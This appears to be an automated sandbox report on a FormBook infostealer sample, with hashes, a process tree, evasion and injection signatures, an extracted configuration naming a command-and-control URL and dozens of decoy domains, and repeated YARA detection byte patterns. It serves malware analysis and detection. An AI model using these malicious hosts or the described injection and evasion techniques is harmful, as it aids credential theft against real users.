Play interactive tour

Edit tour

Windows Analysis Report 85vLO1Rpcy.exe

Overview

General Information

Sample Name:	85vLO1Rpcy.exe
Analysis ID:	452681
MD5:	91663bee11ec2466c36ff85805041fff
SHA1:	944de18e73bbcf9807c960ba925641211d46cd6e
SHA256:	b764504a2998416edbba85e1495c8311f8cc94f5775ce3413b8d3cbd5acf03d7
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

85vLO1Rpcy.exe (PID: 6800 cmdline: 'C:\Users\user\Desktop\85vLO1Rpcy.exe' MD5: 91663BEE11EC2466C36FF85805041FFF)

85vLO1Rpcy.exe (PID: 6872 cmdline: 'C:\Users\user\Desktop\85vLO1Rpcy.exe' MD5: 91663BEE11EC2466C36FF85805041FFF)

explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cscript.exe (PID: 6116 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)

cmd.exe (PID: 6408 cmdline: /c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.85vLO1Rpcy.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.85vLO1Rpcy.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.85vLO1Rpcy.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
2.1.85vLO1Rpcy.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.1.85vLO1Rpcy.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.1.85vLO1Rpcy.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158c9:$sqlite3step: 68 34 1C 7B E1 0x159dc:$sqlite3step: 68 34 1C 7B E1 0x158f8:$sqlite3text: 68 38 2A 90 C5 0x15a1d:$sqlite3text: 68 38 2A 90 C5 0x1590b:$sqlite3blob: 68 53 D8 7F 8C 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
2.2.85vLO1Rpcy.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.85vLO1Rpcy.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.85vLO1Rpcy.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158c9:$sqlite3step: 68 34 1C 7B E1 0x159dc:$sqlite3step: 68 34 1C 7B E1 0x158f8:$sqlite3text: 68 38 2A 90 C5 0x15a1d:$sqlite3text: 68 38 2A 90 C5 0x1590b:$sqlite3blob: 68 53 D8 7F 8C 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
2.1.85vLO1Rpcy.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.1.85vLO1Rpcy.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.1.85vLO1Rpcy.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
1.2.85vLO1Rpcy.exe.2080000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.85vLO1Rpcy.exe.2080000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.85vLO1Rpcy.exe.2080000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158c9:$sqlite3step: 68 34 1C 7B E1 0x159dc:$sqlite3step: 68 34 1C 7B E1 0x158f8:$sqlite3text: 68 38 2A 90 C5 0x15a1d:$sqlite3text: 68 38 2A 90 C5 0x1590b:$sqlite3blob: 68 53 D8 7F 8C 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 13 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://www.invisiongc.net/dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: 85vLO1Rpcy.exe

ReversingLabs: Detection: 47%

Yara detected FormBook

Show sources

Source: Yara match	File source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY

Machine Learning detection for sample

Show sources

Source: 85vLO1Rpcy.exe

Joe Sandbox ML: detected

